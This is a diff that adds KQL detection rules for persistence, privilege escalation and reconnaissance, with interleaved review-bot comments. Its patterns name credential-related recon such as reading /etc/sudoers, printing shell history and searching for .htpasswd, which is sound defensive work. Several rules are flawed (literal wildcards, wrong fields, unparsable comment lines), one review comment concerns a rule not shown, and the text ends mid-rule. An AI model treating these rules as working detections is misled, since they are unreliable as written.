diff --git a/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql b/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql
new file mode 100644
index 00000000..d27ceae5
--- /dev/null
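Review bot: The key selection can never be satisfied: `RegistryKey endswith "...\\Services\\EventLog*"` compares the `*` literally, and `CustomSD` / `ChannelAccess` are value names that DeviceRegistryEvents reports in `RegistryValueName`, not at the end of `RegistryKey`, so every branch — including the `WINEVT\\Channels` one, which is ANDed with `endswith "\\ChannelAccess"` — evaluates false and the rule is silent. A working selection is `((RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\" and RegistryValueName =~ "CustomSD") or ((RegistryKey contains "\\Policies\\Microsoft\\Windows\\EventLog\\" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels") and RegistryValueName =~ "ChannelAccess"))`. The trailing `isnull(InitiatingProcessFolderPath)` is redundant with `=~ ""` because Kusto strings are never null; `isempty(InitiatingProcessFolderPath)` covers both.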
+++ b/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql
@@ -0,0 +1,12 @@
+// Title: Windows Terminal Profile Settings Modification By Uncommon Process
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-22
+// Level: medium
+// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.015
+// False Positives:
+// - Some false positives may occur with admin scripts that set WT settings.
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and FolderPath endswith "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/winekey_registry_modification.kql b/KQL/rules/Privilege Escalation/winekey_registry_modification.kql
new file mode 100644
index 00000000..b75ed32e
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/winekey_registry_modification.kql
@@ -0,0 +1,10 @@
+// Title: WINEKEY Registry Modification
+// Author: omkar72
+// Date: 2020-10-30
+// Level: high
+// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceRegistryEvents
+| where RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr"
\ No newline at end of file
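Review bot: In the second hunk (winekey_registry_modification.kql) `RegistryKey endswith "...\\Run\\Backup Mgr"` cannot match: `Backup Mgr` is the value name written under the Run key, and DeviceRegistryEvents reports it in `RegistryValueName` while `RegistryKey` ends at `\\Run`. Use `RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" and RegistryValueName =~ "Backup Mgr"`.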
diff --git a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql
new file mode 100644
index 00000000..4304fcd6
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Winlogon Notify Key Logon Persistence
+// Author: frack113
+// Date: 2021-12-30
+// Level: high
+// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
+Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.004
+
+DeviceRegistryEvents
+| where RegistryValueData endswith ".dll" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql b/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql
new file mode 100644
index 00000000..36495bef
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql
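Review bot: The description continuation line `Winlogon.exe is a Windows component ...` has no `//` prefix and makes the file unparsable; prefix it with `// `. The match on `RegistryKey endswith "...\\Winlogon\\Notify\\logon"` also deserves a check against a real event: if `logon` is the value name whose data ends in `.dll`, as the `RegistryValueData endswith ".dll"` test suggests, DeviceRegistryEvents will report it as `RegistryKey endswith "...\\Winlogon\\Notify" and RegistryValueName =~ "logon"` and the current form never fires; if `logon` is a subkey, the current form is right.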
@@ -0,0 +1,12 @@
+// Title: WinRAR Creating Files in Startup Locations
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-16
+// Level: high
+// Description: Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder.
+This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\WinRAR.exe" or InitiatingProcessFolderPath endswith "\\Rar.exe") and FolderPath contains "\\Start Menu\\Programs\\Startup\\"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql
new file mode 100644
index 00000000..832f972c
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: WinSock2 Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters" and (RegistryKey contains "\\Protocol_Catalog9\\Catalog_Entries" or RegistryKey contains "\\NameSpace_Catalog5\\Catalog_Entries") and (not((RegistryValueData =~ "(Empty)" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\MsiExec.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\syswow64\\MsiExec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql b/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql
new file mode 100644
index 00000000..db4f03e4
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql
@@ -0,0 +1,10 @@
+// Title: WMI Backdoor Exchange Transport Agent
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-11
+// Level: critical
+// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\EdgeTransport.exe" and (not((FolderPath =~ "C:\\Windows\\System32\\conhost.exe" or (FolderPath endswith "\\Bin\\OleConverter.exe" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql b/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql
new file mode 100644
index 00000000..f19ea27b
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql
@@ -0,0 +1,12 @@
+// Title: WMI Persistence - Command Line Event Consumer
+// Author: Thomas Patzke
+// Date: 2018-03-07
+// Level: high
+// Description: Detects WMI command line event consumers
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence
+// False Positives:
+// - Unknown (data set is too small; further testing needed)
+
+DeviceImageLoadEvents
+| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" and FolderPath endswith "\\wbemcons.dll"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql b/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql
new file mode 100644
index 00000000..1d2e28ed
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql
@@ -0,0 +1,12 @@
+// Title: WMI Persistence - Script Event Consumer File Write
+// Author: Thomas Patzke
+// Date: 2018-03-07
+// Level: high
+// Description: Detects file writes of WMI script event consumer
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence
+// False Positives:
+// - Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe)
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql
new file mode 100644
index 00000000..bb60f6e9
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Wow6432Node Classes Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Wow6432Node\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\ShellEx\\ColumnHandlers" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql
new file mode 100644
index 00000000..2d3ba19d
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql 
@@ -0,0 +1,13 @@
+// Title: Wow6432Node CurrentVersion Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData
endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe")))) and (not(((RegistryValueData endswith "instup.exe\" /instop:repair /wait" and InitiatingProcessFolderPath endswith "\\instup.exe" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair") or ((RegistryValueData in~ ("{472083B1-C522-11CF-8763-00608CC02F24}", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath endswith "\\instup.exe" and (RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)")) or (RegistryValueData endswith "\\Avira.OE.Setup.Bundle.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\Avira.OE.Setup.Bundle.exe") or (RegistryValueData endswith "Discord.exe --checkInstall" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith 
"-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql
new file mode 100644
index 00000000..b85affc9
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql
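Review bot: The five match terms `RegistryKey endswith "\\Run*"`, `"\\RunOnce*"`, `"\\RunOnceEx*"`, `"\\RunServices*"` and `"\\RunServicesOnce*"` compare against a literal asterisk — KQL `endswith` has no wildcard support — so they can never match and the rule silently loses its Run/RunOnce coverage, leaving only the ShellServiceObjectDelayLoad and Explorer branches live. The asterisk looks like a Sigma wildcard the converter copied verbatim; the same literal `*` also defeats the exclusions ending in `\\CurrentVersion\\Run*`, `\\Software\\Wow6432Node*` and `{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*`, and the exclusions keyed on `\\Run\\Discord`, `\\RunOnce\\AvRepair` and `\\00avg\\(Default)` name a registry value, which DeviceRegistryEvents reports in RegistryValueName rather than RegistryKey, so those filters do not apply either. The match terms should drop the asterisk and accept both the key itself and its subkeys, as below; the exclusion terms need the same treatment before the rule's false-positive profile can be trusted.
```kql
DeviceRegistryEvents
| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion"
    and (RegistryKey contains "\\ShellServiceObjectDelayLoad"
        or RegistryKey endswith "\\Run" or RegistryKey contains "\\Run\\"
        or RegistryKey endswith "\\RunOnce" or RegistryKey contains "\\RunOnce\\"
        or RegistryKey endswith "\\RunOnceEx" or RegistryKey contains "\\RunOnceEx\\"
        or RegistryKey endswith "\\RunServices" or RegistryKey contains "\\RunServices\\"
        or RegistryKey endswith "\\RunServicesOnce" or RegistryKey contains "\\RunServicesOnce\\"
        // … unchanged: Explorer\ShellServiceObjects … Explorer\Browser Helper Objects terms …
        ))
    // … unchanged: installer / vendor exclusions, with their literal "*" terms corrected the same way …
```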
@@ -0,0 +1,13 @@
+// Title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Drivers32") and RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or RegistryValueData endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" or isnull(RegistryValueData))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql
new file mode 100644
index 00000000..511889d6
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql
@@ -0,0 +1,12 @@
+// Title: Writing Local Admin Share
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB).
+This technique is used by post-exploitation frameworks.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.lateral-movement, attack.t1546.002
+
+DeviceFileEvents
+| where FolderPath contains "\\\\127.0.0" and FolderPath contains "\\ADMIN$\\"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql
new file mode 100644
index 00000000..e9da2e17
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql
@@ -0,0 +1,14 @@
+// Title: Xwizard.EXE Execution From Non-Default Location
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-09-20
+// Level: high
+// Description: Detects the execution of Xwizard tool from a non-default directory.
+When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Windows installed on non-C drive
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql b/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql
new file mode 100644
index 00000000..f0903e1c
--- /dev/null
+++ b/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql
@@ -0,0 +1,12 @@
+// Title: Access of Sudoers File Content
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /etc/sudoers" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/egrep" or FolderPath endswith "/emacs" or FolderPath endswith "/fgrep" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail")
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/linux_recon_indicators.kql b/KQL/rules/Reconnaissance/linux_recon_indicators.kql
new file mode 100644
index 00000000..2609368d
--- /dev/null
+++ b/KQL/rules/Reconnaissance/linux_recon_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Linux Recon Indicators
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: high
+// Description: Detects events with patterns found in commands used for reconnaissance on linux systems
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004, attack.credential-access, attack.t1552.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -name .htpasswd" or ProcessCommandLine contains " -perm -4000 "
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql b/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql
new file mode 100644
index 00000000..c692837f
--- /dev/null
+++ b/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql
@@ -0,0 +1,12 @@
+// Title: Potential Active Directory Enumeration Using AD Module - ProcCreation
+// Author: frack113
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.discovery, attack.impact
+// False Positives:
+// - Legitimate use of the library for administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/print_history_file_contents.kql b/KQL/rules/Reconnaissance/print_history_file_contents.kql
new file mode 100644
index 00000000..2b58e02d
--- /dev/null
+++ b/KQL/rules/Reconnaissance/print_history_file_contents.kql
@@ -0,0 +1,12 @@
+// Title: Print History File Contents
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (FolderPath endswith "/cat" or FolderPath endswith "/head" or FolderPath endswith "/tail" or FolderPath endswith "/more") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory"))
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql b/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql
new file mode 100644
index 00000000..5a938f7f
--- /dev/null
+++ b/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - PingCastle Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-01-11
+// Level: medium
+// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1595
+
+DeviceProcessEvents
+| where ((MD5 startswith "f741f25ac909ee434e50812d436c73ff" or MD5 startswith "d40acbfc29ee24388262e3d8be16f622" or MD5 startswith "01bb2c16fadb992fa66228cd02d45c60" or MD5 startswith "9e1b18e62e42b5444fc55b51e640355b" or MD5 startswith "b7f8fe33ac471b074ca9e630ba0c7e79" or MD5 startswith "324579d717c9b9b8e71d0269d13f811f" or MD5 startswith "63257a1ddaf83cfa43fe24a3bc06c207" or MD5 startswith "049e85963826b059c9bac273bb9c82ab" or MD5 startswith "ecb98b7b4d4427eb8221381154ff4cb2" or MD5 startswith "faf87749ac790ec3a10dd069d10f9d63" or MD5 startswith "f296dba5d21ad18e6990b1992aea8f83" or MD5 startswith "93ba94355e794b6c6f98204cf39f7a11" or MD5 startswith "a258ef593ac63155523a461ecc73bdba" or MD5 startswith "97000eb5d1653f1140ee3f47186463c4" or MD5 startswith "95eb317fbbe14a82bd9fdf31c48b8d93" or MD5 startswith "32fe9f0d2630ac40ea29023920f20f49" or MD5 startswith "a05930dde939cfd02677fc18bb2b7df5" or MD5 startswith "124283924e86933ff9054a549d3a268b" or MD5 startswith "ceda6909b8573fdeb0351c6920225686" or MD5 startswith "60ce120040f2cd311c810ae6f6bbc182" or MD5 startswith "2f10cdc5b09100a260703a28eadd0ceb" or MD5 startswith "011d967028e797a4c16d547f7ba1463f" or MD5 startswith "2da9152c0970500c697c1c9b4a9e0360" or MD5 startswith "b5ba72034b8f44d431f55275bace9f8b" or MD5 startswith "d6ed9101df0f24e27ff92ddab42dacca" or MD5 startswith "3ed3cdb6d12aa1ac562ad185cdbf2d1d" or MD5 startswith "5e083cd0143ae95a6cb79b68c07ca573" or MD5 startswith "28caff93748cb84be70486e79f04c2df" or MD5 startswith "9d4f12c30f9b500f896efd1800e4dd11" or MD5 startswith "4586f7dd14271ad65a5fb696b393f4c0" or MD5
startswith "86ba9dddbdf49215145b5bcd081d4011" or MD5 startswith "9dce0a481343874ef9a36c9a825ef991" or MD5 startswith "85890f62e231ad964b1fda7a674747ec" or MD5 startswith "599be548da6441d7fe3e9a1bb8cb0833" or MD5 startswith "9b0c7fd5763f66e9b8c7b457fce53f96" or MD5 startswith "32d45718164205aec3e98e0223717d1d" or MD5 startswith "6ff5f373ee7f794cd17db50704d00ddb" or MD5 startswith "88efbdf41f0650f8f58a3053b0ca0459" or MD5 startswith "ef915f61f861d1fb7cbde9afd2e7bd93" or MD5 startswith "781fa16511a595757154b4304d2dd350" or MD5 startswith "5018ec39be0e296f4fc8c8575bfa8486" or MD5 startswith "f4a84d6f1caf0875b50135423d04139f") or (SHA1 startswith "9c1431801fa6342ed68f047842b9a11778fc669b" or SHA1 startswith "c36c862f40dad78cb065197aad15fef690c262f2" or SHA1 startswith "bc8e23faea8b3c537f268b3e81d05b937012272d" or SHA1 startswith "12e0357658614ff60d480d1a6709be68a2e40c5f" or SHA1 startswith "18b33ab5719966393d424a3edbfa8dec225d98fa" or SHA1 startswith "f14c9633040897d375e3069fddc71e859f283778" or SHA1 startswith "08041b426c9f112ad2061bf3c8c718e34739d4fc" or SHA1 